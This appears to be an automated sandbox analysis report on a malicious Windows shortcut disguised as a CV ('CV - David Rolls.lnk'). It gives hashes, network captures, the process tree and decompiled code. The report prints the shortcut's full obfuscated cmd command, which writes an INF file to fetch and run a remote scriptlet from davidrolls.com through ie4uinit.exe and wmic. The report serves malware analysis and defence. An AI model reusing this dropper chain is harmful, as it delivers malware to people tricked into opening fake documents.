Preview:	Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5736;...ReturnValue = 0;..};....

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=14, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=236544, window=hide
Entropy (8bit):	3.2462804958354043
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	CV - David Rolls.lnk
File size:	5495
MD5:	ba88702ee0712536390562efecb979ad
SHA1:	ef1c4d176780db656217bf33088dba7918acd30b
SHA256:	635c496fc044d519146f8e6e94b3d208803a5c2c00065c7e54c04f8276c1d049
SHA512:	c688bda2a3a22f5644927c09c355c4a8df69caa195f4427489098938cf938a763153d71472e5022eccb7cc405391b6f8a6e9dfdd0b6c523b3444f0df33937c88
SSDEEP:	48:8NSlOVihNt1HncESKBQJ2lTM4/G7ozclc6jIF7mGeSPhG4tNoEdRiXuYYmd8mVPL:8N+3lQZr4SoWcjjPAxvcI0nw/m6nL
TLSH:	75B18D5532EC601CF2B7AE30D8B816042B19FA85AC7AC84D8851BD0C55E3AC3D73677B
File Content Preview:	L..................F.... ...................................................5....P.O. .:i.....+00.../C:\...................V.1.....)V............@........OwH8V0.................................................Z.1.....iU..............B........OwH8V.\|......

File Icon


Icon Hash:	74f0e4e4e4e9e1ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\
Command Line Argument:	/v /c set "Images97=si" && set "Images67=version" && set "Images38=d" && set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") && set "Images62=e" && set "Images14=t" && set "Images12=." && (for %k in (a) do @set "Images32=%~k") && set "Images3=History" && call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w" && set "Images88=!Images12!inf" && set "Images58=ieu!Images4!!Images88!" && call !Images6!et "Images84=%!Images32!ppdata%\micro!Images6!oft\" && !Images6!et "Images00=!Images84!!Images58!" && (for %t in ("[!Images67!]" "signature = !Images8!indows nt$" "[!Images38!e!Images6!tinationdirs]" "C3D81=01" "!Images82!destdir=11" "[C3D81]" "ieu%Images15%!Images88!" "[FD48E1]" "sc\" "ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls!Images12!%Images76%/aj55hg3eude" "[!Images82!in!Images6!tall.windows7]" "Un\" "Register\" "OCXs=FD48E1" "!Images38!elfil!Images62!s=C3D81" "[!Images6!!Images14!rings]" "Images2=t;Images26" "!Images6!ervicen!Images32!me=' '" "Images15=!Images4!" "Images27=%time%" "!Images6!hortsvcn!Images32!me=' '" "Images0=/" "Images95=b;Images08" "Images76=com" "Images66=:;Images03" "Images81=h" ) do @e!Images7!ho %~t)>"!Images00!" && !Images6!et "Images20=ie4u!Images4!.!Images62!xe" && call xcopy /Y /C /Q %win!Images38!ir%\!Images6!ystem32\!Images20! "!Images84!*" \| set Images21=Strikes && !Images6!t!Images32!rt "" wmi!Images7! proce!Images6!s call !Images7!rea!Images14!e "!Images84!!Images20! -base!Images43!" \| set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup"
Icon location:	imageres.dll

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 19:26:34.852622032 CET	49696	80	192.168.2.4	23.254.253.145
Jan 25, 2023 19:26:34.989527941 CET	80	49696	23.254.253.145	192.168.2.4
Jan 25, 2023 19:26:34.989742041 CET	49696	80	192.168.2.4	23.254.253.145
Jan 25, 2023 19:26:35.009356976 CET	49696	80	192.168.2.4	23.254.253.145
Jan 25, 2023 19:26:35.146188021 CET	80	49696	23.254.253.145	192.168.2.4
Jan 25, 2023 19:26:35.355648041 CET	80	49696	23.254.253.145	192.168.2.4
Jan 25, 2023 19:26:35.355729103 CET	80	49696	23.254.253.145	192.168.2.4
Jan 25, 2023 19:26:35.355879068 CET	49696	80	192.168.2.4	23.254.253.145
Jan 25, 2023 19:26:38.985177994 CET	49696	80	192.168.2.4	23.254.253.145

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 19:26:34.777251959 CET	56572	53	192.168.2.4	8.8.8.8
Jan 25, 2023 19:26:34.812067986 CET	53	56572	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 25, 2023 19:26:34.777251959 CET	192.168.2.4	8.8.8.8	0x2b98	Standard query (0)	davidrolls.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 25, 2023 19:26:34.812067986 CET	8.8.8.8	192.168.2.4	0x2b98	No error (0)	davidrolls.com		23.254.253.145	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

davidrolls.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49696	23.254.253.145	80	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 19:26:35.009356976 CET	0	OUT	GET /aj55hg3eude HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: davidrolls.com Connection: Keep-Alive
Jan 25, 2023 19:26:35.355648041 CET	2	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 18:26:35 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2065 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 59 6d 8f db 36 12 fe dc 03 ee 3f 30 4a d1 f5 e2 96 d6 6e 37 29 ae 1b db 45 ba 9b a0 bd cb bb 17 68 fb 91 92 68 89 5e 8a 54 49 ca 5e a3 c8 7f ef 90 94 64 49 96 5f 82 c3 21 02 36 b2 c8 79 e3 70 e6 99 21 33 79 72 f7 fe f6 fe 8f 0f af 50 66 72 3e fb e7 3f 26 f6 8d 38 11 e9 34 a0 22 70 23 94 24 f0 46 f0 4c 72 6a 08 8a 33 a2 34 35 d3 a0 34 0b fc ef a0 9e 33 cc 70 3a 7b b9 7c fe 3c 4b af 69 99 d0 49 e8 87 3a bc 52 18 2a 80 77 cd 12 93 4d 13 ba 62 31 c5 ee e3 02 31 c1 0c 23 1c eb 98 70 3a bd 1a 5f 06 48 90 9c 4e 83 15 a3 eb 42 2a 13 0c cb aa c9 1e e8 66 2d 55 a2 8f 90 25 54 c7 8a 15 86 49 b7 c0 8a f6 09 c6 e8 35 01 73 a4 d0 08 e3 5a 04 67 e2 01 65 8a 2e a6 01 cb d3 70 e1 29 c6 85 48 03 a4 28 87 d1 d8 8b 19 a2 26 45 c1 29 36 b2 8c 33 dc 63 eb 4f f5 2c f9 59 4a a3 8d 22 05 ba 9d cf d1 6b c6 e9 b0 4d 9c 45 61 54 d3 86 b1 d6 db af 71 ce c4 18 46 2a 85 da 6c 38 d5 19 a5 a6 a7 ea 0d 8b 14 51 8c ea 46 d5 9e f5 5b 5d 0b 70 26 26 6b aa 65 4e 9d ba f6 c0 41 8d 43 d2 88 60 39 31 b4 7e 7f 31 3f ec a0 db 2f 67 49 fd f1 c5 52 e4 9a c7 44 c9 52 53 1e 12 0d 91 ad ed d0 b8 1e fb 62 79 9c a5 99 89 e4 a3 b3 aa fe 38 75 37 de 12 26 d0 bc 99 3d b0 f5 56 ba 13 73 4c ac 8f 76 a4 55 3c 0d 32 63 0a 7d 13 86 eb f5 7a 9c 4a 99 5a 6e 99 87 8a c6 a4 30 90 d8 10 b2 6c bc 04 71 44 6f 44 8c 12 ba a0 6a 36 09 bd 88 d9 01 81 71 22 80 2f a1 9c ad d4 58 50 13 8a 22 0f c9 23 93 3a 4c 98 36 fe a7 73 02 48 6f 4b 9c 84 15 c0 c0 cf 48 26 1b c4 92 69 50 90 d4 26 47 e1 57 61 1d 13 a2 77 64 05 8e 21 0a 85 ce 1d 13 01 df 31 87 0d 9b 06 f0 33 82 09 ff c2 51 fd 03 b2 00 72 b9 fa a0 8f 05 11 09 ce 13 b4 60 8f 34 71 d2 9d ae 1c 3c 0e b2 9b dd 4c 58 23 d7 42 07 cc 52 55 4f 3a 02 d2 55 8b 21 7d 44 82 96 1a 70 4b 49 ce 83 6a 7f 9e 6e 17 71 07 a8 91 a0 4f 30 a9 27 21 69 cb 8a 4a 63 a4 e8 09 34 32 85 8d 51 80 5c 9c 93 42 d3 24 40 66 53 00 72 79 ea 00 25 c4 90 8a ca 1a e9 a9 ea 61 a2 52 0b ce 4f bd b0 3b ba 20 25 37 c1 56 67 fd 40 ce 13 6c 57 08 46 37 ba 6b 72 3f eb 7d 46 c1 49 0b c2 ad 06 37 ca 49 64 63 ed de e9 b7 ee 65 29 a9 c1 b4 ad 60 a2 81 db 6e b5 7d fd af 53 93 d0 2f be 3d d4 da a9 ca 73 b5 2f 1a d7 a1 65 a9 0d 5b 6c 70 55 05 30 15 89 df f6 ee 7a fb 46 94 bc 27 59 6c 23 a4 43 c8 59 8b 10 33 43 f3 21 b2 9d b8 c1 2e 91 9b 98 41 24 36 6c 45 9b d0 09 66 bf 00 9e 76 63 65 eb 09 ce fe 7f 96 b4 4c 78 19 c9 d2 7c 65 1b e6 54 d9 0e 41 7f 65 33 7e 93 ea e1 2b 9b f0 33 97 e9 57 36 e1 d6 c2 61 7c 7a 48 4c c2 92 77 52 18 12 b6 46 d9 ea f7 24 04 8d b3 36 c4 bf 02 2c f5 08 5f 8f fe 6a 21 0a cd 1f e8 ba 83 ff 36 fb 6d 22 67 90 29 41 6d 3f 73 b4 50 b8 0d 45 51 8a a1 ad 48 61 d2 95 45 80 4f 12 3f a4 30 07 65 c0 4d dc a0 52 f1 91 6d d4 1c 1b 8e d2 f1 b2 48 cf 87 2a 81 5c 51 c5 c9 06 bc a8 a4 2d 5f ad 95 b4 a8 bc 98 0a 6a 10 d4 bd c2 f2 18 12 71 1a ec 01 2e 37 89 63 0a 8e ee 7b ef 58 21 6a 08 c1 4b 93 a2 26 ad b5 fe 60 31 50 2a 9c 00 96 80 74 79 81 a0 37 e6 c9 93 49 58 cc 9a 7e a2 23 26 bb ea ae c3 75 ef 28 8f f0 b3 60 f6 2b 22 39 ea 94 b1 ec 6a 48 46 d1 15 a1 cb c8 49 01 97 59 3c 6f 16 4d 1f 0d d6 9c 25 54 b9 b8 84 8e a0 73 6e f0 25 00 ba 58 29 d2 e1 88 b5 cf ae 30 d7 58 38 ae 99 5d Data Ascii: Ym6?0Jn7)Ehh^TI^dI_!6yp!3yrPfr>?&84"p#$FLrj34543p:{\|<KiI:RwMb11#p:_HNBf-U%TI5sZge.p)H(&E)63cO,YJ"kMEaTqFl8QF[]p&&keNAC`91~1?/gIRDRSby8u7&=VsLvU<2c}zJZn0lqDoDj6q"/XP"#:L6sHoKH&iP&GWawd!13Qr`4q<LX#BRUO:U!}DpKIjnqO0'!iJc42Q\B$@fSry%aRO; %7Vg@lWF7kr?}FI7Idce)`n}S/=s/e[lpU0zF'Yl#CY3C!.A$6lEfvceLx\|eTAe3~+3W6a\|zHLwRF$6,_j!6m"g)Am?sPEQHaEO?0eMRmH\Q-_jq.7c{X!jK&`1P*ty7IX~#&u(`+"9jHFIY<oM%Tsn%X)0X8]
Jan 25, 2023 19:26:35.355729103 CET	3	IN	Data Raw: e6 b0 ab 5a 46 16 06 5f 03 4f 13 fd 91 11 08 fe 70 a1 20 3e d4 c6 fe 6e 61 74 f1 08 9e a8 b3 81 58 70 84 ae 4b f2 6d 5d 9e bd a1 44 09 f4 56 2a 07 dd d6 04 b4 e3 ea 76 ec ec cf 8a ea dd 8f ff 4e 72 68 1a db b2 eb 92 a0 32 a7 5a 87 fb c2 f9 02 59 Data Ascii: ZF_Op >natXpKm]DV*vNrh2ZY\g>#q.Z6`I='n@aN\|&lABX!C'fUc>pJ\{0dU_ #Q"K\|.mh2Mk<G\UGdnIV

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exePID: 724, Parent PID: 3528

General

Target ID:	0
Start time:	19:26:29
Start date:	25/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /v /c set "Images97=si" && set "Images67=version" && set "Images38=d" && set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") && set "Images62=e" && set "Images14=t" && set "Images12=." && (for %k in (a) do @set "Images32=%~k") && set "Images3=History" && call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w" && set "Images88=!Images12!inf" && set "Images58=ieu!Images4!!Images88!" && call !Images6!et "Images84=%!Images32!ppdata%\micro!Images6!oft\" && !Images6!et "Images00=!Images84!!Images58!" && (for %t in ("[!Images67!]" "signature = !Images8!indows nt$" "[!Images38!e!Images6!tinationdirs]" "C3D81=01" "!Images82!destdir=11" "[C3D81]" "ieu%Images15%!Images88!" "[FD48E1]" "sc\" "ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls!Images12!%Images76%/aj55hg3eude" "[!Images82!in!Images6!tall.windows7]" "Un\" "Register\" "OCXs=FD48E1" "!Images38!elfil!Images62!s=C3D81" "[!Images6!!Images14!rings]" "Images2=t;Images26" "!Images6!ervicen!Images32!me=' '" "Images15=!Images4!" "Images27=%time%" "!Images6!hortsvcn!Images32!me=' '" "Images0=/" "Images95=b;Images08" "Images76=com" "Images66=:;Images03" "Images81=h" ) do @e!Images7!ho %~t)>"!Images00!" && !Images6!et "Images20=ie4u!Images4!.!Images62!xe" && call xcopy /Y /C /Q %win!Images38!ir%\!Images6!ystem32\!Images20! "!Images84!*" \| set Images21=Strikes && !Images6!t!Images32!rt "" wmi!Images7! proce!Images6!s call !Images7!rea!Images14!e "!Images84!!Images20! -base!Images43!" \| set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4132, Parent PID: 724

General

Target ID:	1
Start time:	19:26:29
Start date:	25/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1792, Parent PID: 724

General

Target ID:	2
Start time:	19:26:30
Start date:	25/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1980, Parent PID: 724

General

Target ID:	3
Start time:	19:26:30
Start date:	25/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" set Images21=Strikes "
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: xcopy.exePID: 4960, Parent PID: 1792

General

Target ID:	4
Start time:	19:26:30
Start date:	25/01/2023
Path:	C:\Windows\System32\xcopy.exe
Wow64 process (32bit):	false
Commandline:	xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Imagebase:	0x7ff738390000
File size:	47616 bytes
MD5 hash:	6BC7DB1465BEB7607CBCBD7F64007219
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1240, Parent PID: 724

General

Target ID:	5
Start time:	19:26:31
Start date:	25/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1308, Parent PID: 724

General

Target ID:	6
Start time:	19:26:31
Start date:	25/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup""
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WMIC.exePID: 4560, Parent PID: 1240

General

Target ID:	7
Start time:	19:26:31
Start date:	25/01/2023
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Imagebase:	0x7ff627770000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1012, Parent PID: 4560

General

Target ID:	8
Start time:	19:26:31
Start date:	25/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ie4uinit.exePID: 5736, Parent PID: 2176

General

Target ID:	9
Start time:	19:26:32
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Imagebase:	0x7ff7319c0000
File size:	221184 bytes
MD5 hash:	9DD77F0F421AA9A70383210706ECA529
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 2%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: ie4uinit.exePID: 5056, Parent PID: 5736

General

Target ID:	10
Start time:	19:26:32
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Imagebase:	0x7ff7319c0000
File size:	221184 bytes
MD5 hash:	9DD77F0F421AA9A70383210706ECA529
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1396, Parent PID: 5056

General

Target ID:	12
Start time:	19:26:34
Start date:	25/01/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Imagebase:	0x7ff78f1d0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5944, Parent PID: 5056

General

Target ID:	13
Start time:	19:26:34
Start date:	25/01/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Imagebase:	0x7ff78f1d0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Reset < >

Analysis Process: ie4uinit.exePID: 5736, Parent PID: 2176COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.2%
Total number of Nodes:	515
Total number of Limit Nodes:	11

Executed Functions

Function 00007FF7319C1B44 Relevance: 91.3, APIs: 9, Strings: 43, Instructions: 275
registryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00007FF77FF7319C1B44(long long __rbx, long long __rdi, long long __rsi) {
				void* _t130;
				long _t132;
				long _t134;
				void* _t136;
				long _t138;
				long _t141;
				void* _t146;
				void* _t150;
				void* _t155;
				void* _t172;
				signed long long _t173;
				long long _t175;
				long long _t192;
				long long _t217;
				long long _t219;
				long long _t220;
				long long _t238;
				long long _t247;
				long long _t250;
				void* _t253;
				long long* _t254;
				void* _t256;
				signed long long _t257;
				long long _t259;
				long long _t268;
				long long _t274;
				long long _t275;
				int _t277;
				long long _t278;
				int _t280;
				long long _t281;
				void* _t283;
				long long _t284;
				void* _t286;
				long long _t287;

				_t172 = _t256;
				 *((long long*)(_t172 + 8)) = __rbx;
				 *((long long*)(_t172 + 0x10)) = __rsi;
				 *((long long*)(_t172 + 0x18)) = __rdi;
				_t254 = _t172 - 0xb08;
				_t257 = _t256 - 0xbe0;
				_t173 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t254 + 0xad0) = _t173 ^ _t257;
				 *(_t257 + 0x50) =  *(_t257 + 0x50) & 0x00000000;
				_t175 = L"Times New Roman";
				 *(_t254 + 0x90) =  *(_t254 + 0x90) & 0x00000000;
				_t219 = L"Sylfaen";
				 *((long long*)(_t257 + 0x58)) = _t175;
				_t250 = L"Segoe UI Symbol";
				 *((long long*)(_t257 + 0x60)) = _t175;
				_t281 = L"DokChampa";
				 *((long long*)(_t257 + 0x68)) = _t175;
				_t278 = L"Microsoft Himalaya";
				 *((long long*)(_t257 + 0x70)) = _t175;
				_t287 = L"Nyala";
				 *((long long*)(_t257 + 0x78)) = _t219;
				 *((long long*)(_t254 - 0x80)) = L"Arial";
				_t284 = L"Euphemia";
				 *((long long*)(_t254 - 0x10)) = _t219;
				 *((long long*)(_t254 - 0x78)) = L"Simplified Arabic";
				_t247 = L"Plantagenet Cherokee";
				 *((long long*)(_t254 - 0x20)) = _t281;
				 *((long long*)(_t254 - 0x70)) = L"Mangal";
				_t217 = L"Microsoft Yi Baiti";
				 *((long long*)(_t254 - 0x18)) = _t278;
				 *((long long*)(_t254 - 0x68)) = L"Vrinda";
				_t275 = L"Iskoola Pota";
				 *((long long*)(_t254 + 0x18)) = _t287;
				 *((long long*)(_t254 - 0x60)) = L"Raavi";
				_t274 = L"Estrangelo Edessa";
				 *((long long*)(_t254 + 0x20)) = _t284;
				 *((long long*)(_t254 - 0x58)) = L"Shruti";
				_t268 = L"Myanmar Text";
				 *((long long*)(_t254 + 0x28)) = _t247;
				 *((long long*)(_t254 - 0x50)) = L"Kalinga";
				_t259 = L"DaunPenh";
				 *((long long*)(_t254 + 0x30)) = _t217;
				 *((long long*)(_t254 - 0x48)) = L"Latha";
				_t238 = L"MV Boli";
				 *((long long*)(_t254 + 0x38)) = _t250;
				 *((long long*)(_t254 - 0x40)) = L"Gautami";
				_t220 = L"Mongolian Baiti";
				 *((long long*)(_t254 + 0x40)) = _t250;
				 *((long long*)(_t254 - 0x38)) = L"Tunga";
				asm("xorps xmm0, xmm0");
				asm("movdqa [esp+0x40], xmm0");
				 *((long long*)(_t254 - 0x30)) = L"Kartika";
				 *((long long*)(_t254 - 0x28)) = L"Tahoma";
				 *((long long*)(_t254 - 8)) = L"Gulim";
				 *_t254 = L"MS PGothic";
				 *((long long*)(_t254 + 8)) = L"PMingLiu";
				 *((long long*)(_t254 + 0x10)) = L"Simsun";
				_t192 = L"Courier New";
				 *((long long*)(_t254 + 0x98)) = _t192;
				 *((long long*)(_t254 + 0xa0)) = _t192;
				 *((long long*)(_t254 + 0xa8)) = _t192;
				 *((long long*)(_t254 + 0xb0)) = _t192;
				 *((long long*)(_t254 + 0xb8)) = L"Sylfaen";
				 *((long long*)(_t254 + 0x48)) = _t250;
				 *((long long*)(_t254 + 0x50)) = _t275;
				 *((long long*)(_t254 + 0x58)) = _t274;
				 *((long long*)(_t254 + 0x60)) = _t268;
				 *((long long*)(_t254 + 0x68)) = _t259;
				 *((long long*)(_t254 + 0x70)) = _t238;
				 *((long long*)(_t254 + 0x78)) = _t220;
				asm("movdqa [ebp+0x80], xmm0");
				 *((long long*)(_t254 + 0xc0)) = L"Miriam Fixed";
				 *((long long*)(_t254 + 0xc8)) = L"Simplified Arabic Fixed";
				 *((long long*)(_t254 + 0xd0)) = L"Mangal";
				 *((long long*)(_t254 + 0xd8)) = L"Vrinda";
				 *((long long*)(_t254 + 0xe0)) = L"Raavi";
				 *((long long*)(_t254 + 0xe8)) = L"Shruti";
				 *((long long*)(_t254 + 0xf0)) = L"Kalinga";
				 *((long long*)(_t254 + 0xf8)) = L"Latha";
				 *((long long*)(_t254 + 0x100)) = L"Gautami";
				 *((long long*)(_t254 + 0x108)) = L"Tunga";
				 *((long long*)(_t254 + 0x110)) = L"Kartika";
				 *((long long*)(_t254 + 0x118)) = L"Tahoma";
				 *((long long*)(_t254 + 0x130)) = L"Sylfaen";
				 *((long long*)(_t254 + 0x138)) = L"GulimChe";
				 *((long long*)(_t254 + 0x140)) = L"MS Gothic";
				 *((long long*)(_t254 + 0x170)) = _t217;
				 *((long long*)(_t254 + 0x148)) = L"MingLiu";
				 *((long long*)(_t254 + 0x158)) = _t287;
				r15d = 0;
				 *((long long*)(_t254 + 0x120)) = _t281;
				 *((long long*)(_t254 + 0x128)) = _t278;
				_t71 = _t217 + 0x1d; // 0x20
				r13d = _t71;
				 *((long long*)(_t254 + 0x178)) = _t250;
				_t73 = _t217 + 0x3d; // 0x40
				r12d = _t73;
				 *((long long*)(_t254 + 0x180)) = _t250;
				 *((long long*)(_t254 + 0x188)) = _t250;
				 *((long long*)(_t254 + 0x150)) = L"NSimsun";
				 *((long long*)(_t254 + 0x160)) = _t284;
				 *((long long*)(_t254 + 0x168)) = _t247;
				 *((long long*)(_t254 + 0x190)) = _t275;
				 *((long long*)(_t254 + 0x198)) = _t274;
				 *((long long*)(_t254 + 0x1a0)) = _t268;
				 *((long long*)(_t254 + 0x1a8)) = _t259;
				 *((long long*)(_t254 + 0x1b0)) = _t238;
				 *((long long*)(_t254 + 0x1b8)) = _t220;
				 *((intOrPtr*)(_t257 + 0x20)) = 3;
				E00007FF77FF7319C1394(_t130, _t254 + 0x2d0, _t238, L"%s\\%u", L"software\\microsoft\\Internet Explorer\\International\\Scripts", _t286);
				r14b = 1;
				r9d = 0x2001f;
				 *((long long*)(_t257 + 0x20)) = _t257 + 0x38;
				r8d = 0;
				dil = r14b; // executed
				_t132 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t132 != 0) goto 0x319c2007;
				memset(_t283, _t280, _t277);
				 *((long long*)(_t257 + 0x28)) = _t257 + 0x30;
				 *((intOrPtr*)(_t257 + 0x30)) = r12d;
				r9d = 0;
				 *((long long*)(_t257 + 0x20)) = _t254 + 0x1c0;
				r8d = 0; // executed
				_t134 = RegQueryValueExW(??, ??, ??, ??, ??, ??); // executed
				if (_t134 != 0) goto 0x319c1f89;
				_t136 =  *((intOrPtr*)(_t257 + 0x30)) + 0xfffffffe;
				if (_t136 - 0x3d > 0) goto 0x319c1f89;
				__imp__StrCmpIW();
				if (_t136 == 0) goto 0x319c1f89;
				if (3 != 8) goto 0x319c1f86;
